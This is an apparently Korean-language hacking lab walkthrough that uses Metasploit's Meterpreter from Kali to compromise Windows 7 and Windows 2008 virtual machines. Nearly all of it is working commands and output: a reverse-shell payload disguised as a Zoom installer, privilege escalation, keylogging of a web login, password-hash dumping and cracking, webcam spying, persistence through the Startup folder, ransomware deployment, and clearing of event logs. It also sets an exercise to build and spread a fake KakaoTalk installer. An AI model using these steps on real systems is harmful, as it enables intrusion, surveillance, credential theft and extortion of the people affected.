Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Microsoft Teredo Tunneling Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:82:c5:58
MTU : 1500
IPv4 Address : 192.168.20.202
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::d9cb:96ac:6dc8:e078
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
192.168.20.1 00:50:56:c0:00:01 12
192.168.20.50 00:0c:29:cd:dd:3d 12
192.168.20.100 00:0c:29:37:7f:2c 12
192.168.20.200 00:0c:29:9f:c2:3e 12
192.168.20.255 ff:ff:ff:ff:ff:ff 12
224.0.0.22 00:00:00:00:00:00 1
224.0.0.22 01:00:5e:00:00:16 12
224.0.0.252 01:00:5e:00:00:fc 12
239.255.255.250 00:00:00:00:00:00 1
239.255.255.250 01:00:5e:7f:ff:fa 12
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.20.100 266 12
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.20.0 255.255.255.0 192.168.20.202 266 12
192.168.20.202 255.255.255.255 192.168.20.202 266 12
192.168.20.255 255.255.255.255 192.168.20.202 266 12
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.20.202 266 12
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.20.202 266 12
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 736/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 800/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 920/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 496/services.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 1592/svchost.exe
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 512/lsass.exe
tcp 192.168.20.202:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.20.202:49160 192.168.20.50:4444 ESTABLISHED 0 0 2780/ZoomInstallerFull.exe
tcp 192.168.20.202:49161 104.74.157.169:443 CLOSE_WAIT 0 0 2116/jucheck.exe
tcp6 :::135 :::*
~ 중간 생략 ~
3) 권한 확인 및 상승
meterpreter > getuid
Server username: MSDN-SPECIAL\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
4) 타켓 시스템(Windows7) 프로세스 확인
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
224 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
240 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
264 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
316 300 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
376 300 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
396 384 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
448 384 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
484 376 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
492 376 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
500 376 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
616 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
676 484 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
720 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
796 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
844 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
872 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
996 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1072 272 explorer.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\Explorer.EXE
1112 2744 dinotify.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\System32\dinotify.exe
1136 484 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1164 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1348 484 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1384 484 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1552 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1636 616 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1700 484 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1812 484 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
1948 484 taskhost.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\taskhost.exe
2000 844 dwm.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\Dwm.exe
2168 1396 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
2212 1072 vmtoolsd.exe x64 1 MSDN-SPECIAL\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2324 2240 jusched.exe x86 1 MSDN-SPECIAL\Administrator C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
2356 1072 ZoomInstallerFull.exe x64 1 MSDN-SPECIAL\Administrator C:\Users\Administrator\Desktop\ZoomInstallerFull.exe
2816 1396 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
2956 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
Ex) 타겟 시스템(Windows7)에서 Reverse_TCP로 Kali에 연결된 PID/PPID, 프로세스 이름은 어떻게되는가?
meterpreter > getpid
Current pid: 2356
5) 타겟 시스템(Windows7)의 Reverse_TCP 프로세스를 다른 프로세스로 이전
- 타겟 시스템(Windows7)에서 'ZoomInstallerFull.exe'가 동작을 하지 않기 때문에 작업 관리자에서 프로세스를 종료할 수 있다.
- 그렇기 때문에 'ZoomInstallerFull.exe' 프로세스를 부모 프로세스(1072 explorer.exe) 또는 다른 프로세스로 이전해야 한다.
meterpreter > migrate 1072
[*] Migrating from 2356 to 1072...
[*] Migration completed successfully.
- 만약, 이전이 안되면 Windows7를 재부팅한다.
- Kali에서는 메타스플로잇을 종료한다.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
msf exploit(multi/handler) >
msf exploit(multi/handler) > exit
- 12번, 13-1) ~ 5) 과정을 다시 진행한다.
6) 타겟 시스템(Windows7) 스크린샷
meterpreter > screenshot
Screenshot saved to: /root/ZLAcHSeg.jpeg
- Kali에서 '/root' 디렉토리에 가서 스크린샷 사진 파일을 확인한다.
7) 타겟 시스템(Windows7) 키보드 스니핑
meterpreter > enumdesktops
Enumerating all accessible desktops
Desktops
========
Session Station Name
------- ------- ----
1 WinSta0 Default
1 WinSta0 Disconnect
1 WinSta0 Winlogon
meterpreter > setdesktop
Changed to desktop WinSta0\Default
meterpreter > getdesktop
Session 1\WinSta0\Default
meterpreter > keyscan_start
Starting the keystroke sniffer ...
- 타겟 시스템(Windows7)에서 메모장을 오픈하여 적당한 문자들을 입력한다.
- 타겟 시스템(Windows7)에서 크롬 브라우저를 실행하여 네이버를 접속하여 로그인을 실시한다.
meterpreter > keyscan_dump
Dumping captured keystrokes...
<Left Windows>notepad<CR>
abcd1234<CR>
www.naver.com<CR>
ncs10322<Tab>abcd1234<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
8) 타겟 시스템(Windows7) 패스워드 크래킹
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9bdb6090f64856d2c16f39eddf5c210e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
Administrator:"toor"
[*] Dumping password hashes...
|─────NTLM 해시값──────|
Administrator:500:aad3b435b51404eeaad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[참고] 해시킬러 사이트
- https://hashes.com/en/decrypt/hash
- NTLM 해시값 afc44ee7351d61d00698796da06b1ebf 입력 -> Captcha Check 입력 -> SUBMIT & SEARCH 클릭
Found:
afc44ee7351d61d00698796da06b1ebf:toor
9) 타겟 시스템(Windows7) 웹캠 해킹
meterpreter > webcam_list
1: SPC-A1200MB Webcam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/XOzzJyHN.jpeg
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: sZtogMZA.html
[*] Streaming...
- Kali에서 브라우저가 실행되면서 타겟 시스템(Windows7) 웹캠으로 촬영되는 영상이 플레이된다.
- 확인이 완료되었으면, Ctrl+C를 실시하여 웹캡 영상 플레이를 종료한다.
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: sZtogMZA.html
[*] Streaming...
(Ctrl+C)
[-] Error running command webcam_stream: Interrupt
meterpreter >
10) 타겟 시스템(Windows7) 특정 프로세스 종료
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
112 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
220 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
260 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
316 296 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
396 296 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
404 388 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
460 388 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
496 396 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
512 396 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
520 396 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
632 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
692 496 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
736 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
800 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
824 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
868 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
920 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1140 496 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1168 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1364 496 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1400 496 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1592 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1692 632 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1704 2240 notepad.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\notepad.exe
1720 496 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1776 632 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
1840 496 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2116 2516 jucheck.exe x86 1 MSDN-SPECIAL\Administrator C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
2132 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
2140 496 taskhost.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\taskhost.exe
2212 868 dwm.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\Dwm.exe
2240 2188 explorer.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\Explorer.EXE
2396 2240 vmtoolsd.exe x64 1 MSDN-SPECIAL\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2516 2412 jusched.exe x86 1 MSDN-SPECIAL\Administrator C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
2616 2356 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
2624 2356 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
2640 800 audiodg.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\AUDIODG.EXE
2780 2240 ZoomInstallerFull.exe x64 1 MSDN-SPECIAL\Administrator C:\Users\Administrator\Desktop\ZoomInstallerFull.exe
- 타겟 시스템(Windows7)에서 실행 중인 'notepad.exe'를 종료한다.
meterpreter > kill 1704
Killing: 1704
meterpreter > ps
~ 중간 생략 ~
- 타겟 시스템(Windows7)에서 notepad가 종료되었는지 확인한다.
11) 타겟 시스템(Windows7) 쉘 프롬프트 사용
- 쉘 프롬프트을 이용하여 타켓 시스템의 CLI 기반 명령어를 수행할 수 있다.
meterpreter > shell
Process 1948 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>cd ..
cd ..
C:\Windows>cd ..
cd ..
C:\>exit
exit
meterpreter >
12) 타겟 시스템(Windows7) 재부팅
meterpreter > reboot
Rebooting...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
13) 타겟 시스템(Windows7) 종료
meterpreter > shutdown
Shutting down...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
14) 다운로드/업로드 및 파일 삭제
- 타겟 시스템(Windows7) 바탕화면에 notepad를 이용하여 'password' 파일을 생성한다. 이때, 파일 내용은 적당히 입력한다.
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter >
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2575 fil 2019-08-13 13:18:18 +0900 Microsoft Office Excel 2007.lnk
100666/rw-rw-rw- 2581 fil 2019-08-13 13:18:18 +0900 Microsoft Office Word 2007.lnk
100666/rw-rw-rw- 1208 fil 2019-08-08 13:56:15 +0900 SecureCRT.lnk
100777/rwxrwxrwx 24576 fil 2022-05-22 12:18:52 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 282 fil 2019-08-08 10:15:08 +0900 desktop.ini
100666/rw-rw-rw- 4 fil 2022-05-22 14:43:17 +0900 password.txt
40777/rwxrwxrwx 4096 dir 2019-08-08 11:12:06 +0900 설치 파일
meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 4.00 B of 4.00 B (100.0%): password.txt -> password.txt
[*] download : password.txt -> password.txt
- Kali 다른 터미널 창에서 'password.txt' 파일이 다운로드되었는지 확인한다.
root@kali:~# ls -l password.txt
-rw-r--r-- 1 root root 4 5월 22 14:43 password.txt
root@kali:~#
root@kali:~# cat password.txt
1234
- Kali에서 '/etc/issue' 파일을 타겟 시스템(Windows7) 바탕화면에 업로드한다.
meterpreter > upload /etc/issue
[*] uploading : /etc/issue -> issue
[*] uploaded : /etc/issue -> issue
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2575 fil 2019-08-13 13:18:18 +0900 Microsoft Office Excel 2007.lnk
100666/rw-rw-rw- 2581 fil 2019-08-13 13:18:18 +0900 Microsoft Office Word 2007.lnk
100666/rw-rw-rw- 1208 fil 2019-08-08 13:56:15 +0900 SecureCRT.lnk
100777/rwxrwxrwx 24576 fil 2022-05-22 12:18:52 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 282 fil 2019-08-08 10:15:08 +0900 desktop.ini
100666/rw-rw-rw- 29 fil 2022-05-22 14:47:45 +0900 issue
100666/rw-rw-rw- 4 fil 2022-05-22 14:43:17 +0900 password.txt
40777/rwxrwxrwx 4096 dir 2019-08-08 11:12:06 +0900 설치 파일
- 타겟 시스템(Windows7) 바탕화면에 'issue' 파일이 업로드되었는지 확인한다.
- 타겟 시스템(Windows7) 바탕화면에 'issue' 파일을 삭제한다.
meterpreter > rm issue
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2575 fil 2019-08-13 13:18:18 +0900 Microsoft Office Excel 2007.lnk
100666/rw-rw-rw- 2581 fil 2019-08-13 13:18:18 +0900 Microsoft Office Word 2007.lnk
100666/rw-rw-rw- 1208 fil 2019-08-08 13:56:15 +0900 SecureCRT.lnk
100777/rwxrwxrwx 24576 fil 2022-05-22 12:18:52 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 282 fil 2019-08-08 10:15:08 +0900 desktop.ini
100666/rw-rw-rw- 4 fil 2022-05-22 14:43:17 +0900 password.txt
40777/rwxrwxrwx 4096 dir 2019-08-08 11:12:06 +0900 설치 파일
- 타겟 시스템(Windows7) 바탕화면에 'issue' 파일이 삭제되었는지 확인한다.
14. Reverse_TCP 페이로드 업로드
1) 윈도우 시작프로그램 메뉴 폴더 이동
meterpreter > cd C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\"Start Menu"\\Programs\\Startup
meterpreter > pwd
C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
meterpreter > dir
Listing: C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
2) 윈도우 시작프로그램 메뉴에 Reverse_TCP 페이로드(ZoomInstallerFull.exe) 업로드 실시
meterpreter > upload /root/payloads/ZoomInstallerFull.exe
[*] uploading : /root/payloads/ZoomInstallerFull.exe -> ZoomInstallerFull.exe
[*] uploaded : /root/payloads/ZoomInstallerFull.exe -> ZoomInstallerFull.exe
meterpreter > dir
Listing: C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2022-05-22 15:01:26 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
- 타겟 시스템(Windows7)에서 시작 -> 모든 프로그램 -> 시작프로그램 -> 'ZoomInstallerFull.exe' 파일 확인
- C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 이동 확인
3) 시작프로그램에 업로드된 'ZoomInstallerFull.exe' 자동 실행 확인
① Kali에서 메타스플로잇을 종료한다.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) >
msf exploit(multi/handler) > exit
root@kali:~#
② 타겟 시스템(Windows7) 재부팅
③ Kali에서 'reverse.rc' 스크립트 실행
root@kali:~# msfconsole -q -r reverse.rc
~ 중간 생략 ~
④ 타겟 시스템(Windows7) 로그인 실시
⑤ Kali에서 Reverse_TCP 연결 확인
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49160) at 2022-05-22 15:07:06 +0900
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MSDN-SPECIAL\Administrator @ MSDN-SPECIAL 192.168.20.50:4444 -> 192.168.20.202:49160 (192.168.20.202)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
15. 랜섬웨어 업로드
1) 윈도우 시작프로그램 메뉴 폴더 이동
meterpreter > cd C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\"Start Menu"\\Programs\\Startup
meterpreter > pwd
C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
meterpreter > dir
Listing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2022-05-22 15:01:26 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
2) 윈도우 시작프로그램 메뉴에 랜섬웨어(wanna_smile.exe) 업로드 실시
meterpreter > upload /root/Ransomware/wanna_smile.exe
[*] uploading : /root/Ransomware/wanna_smile.exe -> wanna_smile.exe
[*] uploaded : /root/Ransomware/wanna_smile.exe -> wanna_smile.exe
meterpreter >
meterpreter > dir
Listing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2022-05-22 15:01:26 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
100777/rwxrwxrwx 120320 fil 2022-05-22 15:19:44 +0900 wanna_smile.exe
- 타겟 시스템(Windows7)에서 시작 -> 모든 프로그램 -> 시작프로그램 -> 'wanna_smile.exe' 파일 확인
- C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 이동 확인
3) 시작프로그램에 업로드된 'wanna_smile.exe' 자동 실행 확인
① Kali에서 메타스플로잇을 종료한다.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) >
msf exploit(multi/handler) > exit
root@kali:~#
② 타겟 시스템(Windows7) 재부팅
③ Kali에서 'reverse.rc' 스크립트 실행
root@kali:~# msfconsole -q -r reverse.rc
~ 중간 생략 ~
④ 타겟 시스템(Windows7) 로그인 실시
⑤ Kali에서 Reverse_TCP 연결 확인
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49160) at 2022-05-22 15:24:41 +0900
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MSDN-SPECIAL\Administrator @ MSDN-SPECIAL 192.168.20.50:4444 -> 192.168.20.202:49160 (192.168.20.202)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
⑥ 타겟 시스템(Windows7)에서 'wanna_smile.exe' 자동 실행 확인
~ 중간 생략 ~
0 I need bitconin
1 I need bitconin
2 I need bitconin
3 I need bitconin
4 I need bitconin
.
.
.
- 컴퓨터 -> 우측 검색 -> *.smile 검색 -> 암호화된 파일 확인
⑦ 타겟 시스템(Windows7) 암호화된 파일 복구
- 바탕화면 -> 설치 파일 -> 랜섬웨어 복호화 -> 'wanna_dec.exe' 실행
- 컴퓨터 -> 우측 검색 -> *.smile 검색 -> 암호화된 파일 확인(로그 파일 몇개는 유지됨)
- 다음 내용을 알아보기 위해서 다음과 같은 작업을 실시한다.
Kali 메타스플로잇 종료
타겟 시스템(Windows7) 시작프로그램에 업로드된 'ZoomInstallerFull.exe', 'wanna_dec.exe' 파일 삭제
Ex) 'KakaoTalk_Setup.exe' 악성 페이로드 제작 및 유포
- 10번 ~ 15번 내용 실시한다.
- 13-5) 프로세스 이전 내용은 하지마세요.
16. Windows2008 시스템 로그 삭제
1) Kali에서 'reverse.rc' 스크립트 실행
root@kali:~# msfconsole -q -r reverse.rc
[*] Processing reverse.rc for ERB directives.
resource (reverse.rc)> use exploit/multi/handler
resource (reverse.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reverse.rc)> set lhost 192.168.20.50
lhost => 192.168.20.50
resource (reverse.rc)> set lport 4444
lport => 4444
resource (reverse.rc)> set exitsession false
exitsession => false
resource (reverse.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.20.50:4444
2) 타켓 시스템(Windows2008) 이벤트 로그 확인
- 윈도우 키 -> 프로그램 및 파일 검색 -> '이벤트 뷰어' 클릭
- 또는, Ctrl+R -> 'eventvwr.msc' 실행
3) 타켓 시스템(Windows2008) 로그 파일 위치
- C:\Windows\System32\winevt\Logs
Application.evtx
Security.evtx
Setup.evtx
System.evtx
[참고] 리눅스 로그 디렉토리
/var/log
/etc/httpd/logs
/var/log/apache2
4) 타켓 시스템(Windows2008)에서 Reverse_TCP 동작을 실시하는 'ZoomInstallerFull.exe' 파일을 실행한다.
5) Kali에서 Meterpreter session이 연결되었는지 확인한다.
[*] Sending stage (205891 bytes) to 192.168.20.201
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.201:49180) at 2022-05-22 15:46:03 +0900
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN2008\Administrator @ WIN2008 192.168.20.50:4444 -> 192.168.20.201:49180 (192.168.20.201)
msf exploit(multi/handler) >
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN2008
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
6) 타켓 시스템(Windows2008) 로그 삭제
meterpreter > shell
Process 1984 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>wevtutil cl "application"
wevtutil cl "application"
C:\Windows\system32>wevtutil cl "security"
wevtutil cl "security"
C:\Windows\system32>wevtutil cl "setup"
wevtutil cl "setup"
C:\Windows\system32>wevtutil cl "system"
wevtutil cl "system"
C:\Windows\system32>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
